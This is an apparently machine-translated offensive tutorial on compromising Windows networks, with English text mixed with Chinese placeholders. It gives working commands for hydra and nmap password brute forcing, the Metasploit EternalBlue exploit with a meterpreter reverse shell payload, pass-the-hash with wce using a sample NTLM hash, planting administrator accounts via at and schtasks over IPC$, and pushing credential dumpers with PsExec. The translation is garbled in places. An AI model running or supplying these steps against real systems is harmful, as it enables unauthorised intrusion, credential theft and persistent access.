Port Scan
Common port and attack
Specific scanning method Click here to jump my other article, which detailed the use of port scanning tool
Weak password scanning
Weak password scanning, for example, mysql, vnc, rdp, http management and other weak passwords to log into the service, you can use some of the weak password scanning tools, xscan, hydra, medusa, nmap and so on. You can also find yourself more and better tools
hydra
1. First open which ports with nmap scan
2. Use of hydra weak password can be scanning port scanning
hydra -L user.txt -P pass.txt 192.168.16.137(爆破的ip) smb(爆破的服务名)
-l username -L specified designated blasting blasting blasting designated user name -p password dictionary -P specify blasting password dictionary
nmap script
scripts under namp installation directory: script path
Blasting script: brute vulnerability detection script: vuln
use
nmap -p 脚本正针对的端口 --script 脚本名 要攻击的ip
msfconsole
1. Enter into the msfconsole
2. Check the corresponding script vulnerability available
search 17_010
3. Check out some vulnerability scan scripts
use auxiliary/scanner/
4. Use a vulnerable machine to scan the script specified in the network segment
use auxiliary/scanner/smb/smb_ms17_010
set threads 10
set rhosts 要扫描的网段/24
exploit
5. Select the appropriate machine vulnerable to attack exp
use exploit/windows/smb/ms17_010_eternalblue
set lhost 本机ip
set rhosts 要攻击的ip/32
set payload windows/x64/meterpreter/reverse_tcp
exploit
hash injection
principle
hash injection principle is local or domain users we have prepared a good hash injected into the target machine's local authentication process lsass.exe go, so that it is as if they log in to your local machine at the same time use ipc login to get the target machine authority. For local or domain user target machine hash how to get it to play your own imagination, hash inject itself in order to deal with those who can not crack NTLM HASH
method
1. First use wce obtain a hash value of the machine within the network, and can not break too complex
wce -l
2. Due to usage, network password many machines in many cases is the same (when the same password hash value is the same)
3. In the other machines try to get the hash to the landing, the landing can be the same as if the account password
1. Get the target name or domain name
ping -a 目标机ip
2. Before obtaining the hash value using the landing, there is no substitute ntlmhash available 0
wce.exe -s Administrator:WIN-P68FLB30G1I:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942
3. Remote access to the target machine c drive share files by default
dir \\目标机ip\c$
The target plate 4. c mapped to the local machine
net use z: \\目标机ip\c$
Remote connection & execution procedures
Add Scheduled Task
at Scheduled Tasks
note
Use Case: get the target machine account password but can not remote desktop connection
needs to open the Task Scheduler service
1. Using IPC $ default shared remote connection to the target machine
net use \\目标机ip /user:administrator 密码
2. Check the target time
net time \\目标机ip
3. Add at scheduled task execution
3.1 Direct command execution
at \\目标机ip 时间 命令
Example:
Create a user
at \\192.168.16.158 12:50 net user zs 123.com /add
Add the user to the Administrators group
at \\192.168.16.158 12:50 localgroup administrators zs /add
3.2 using a script
Create a bat file, content to create a new user and add it to the Administrators group
Copy the file to the target machine bat
copy 1.bat \\目标机ip\c$\1.bat
Add Scheduled Task to run this script
at \\目标机ip 时间 脚本路径
4. Review the target machine at a list of all tasks
at \\192.168.16.158
Add schtasks scheduled task execution
Note
the use of the situation: to get the target machine account password but can not remote desktop connection
needs to turn on the system after the 2003 Task Scheduler service before you can use
1. Create a bat file, content to create a new user and add it to the Administrators group
2. Using IPC $ default shared remote connection to the target machine
net use \\目标机ip /user:administrator 密码
3. Copy the file to the target machine bat
copy 1.bat \\目标机ip\c$\1.bat
4. Review the target time
net time \\目标机ip
5. Enter the following command schtasks Add Scheduled Task
schtasks /create /tn aa /tr 脚本路径 /sc once /st 时间 /S 目标机ip /U 用户名 /P 密码 /RU system
Plus / RU system is performed by the user system, also can be removed, the script may be replaced with a single path command
6. direct implementation plan is not a task execution
schtasks /run /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码
7. Delete Scheduled Tasks
schtasks /F /delete /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码
psexec remote execution
1. Using local remote upload software to the target
net use \\目标机ip\c$ /user:administrator 密码
copy wce.exe \\目标机ip\c$\
2. Perform target local programs
PsExec.exe \\目标机ip –accepteula -u 用户 -p 密码 执行的程序
Will play the first run box, enter -accepteula this parameter can bypass
3. Use psexec own local program parameters are uploaded to the target machine, automatically deleted after execution
Psexec.exe \\目标机ip -u 用户 -p 密码 -c QuarksPwDump.exe -d
-c <[path] filename>: copy the file to the remote machine and run (Note: The file is automatically deleted after the end of the run)
-d is not waiting for the program to return to finish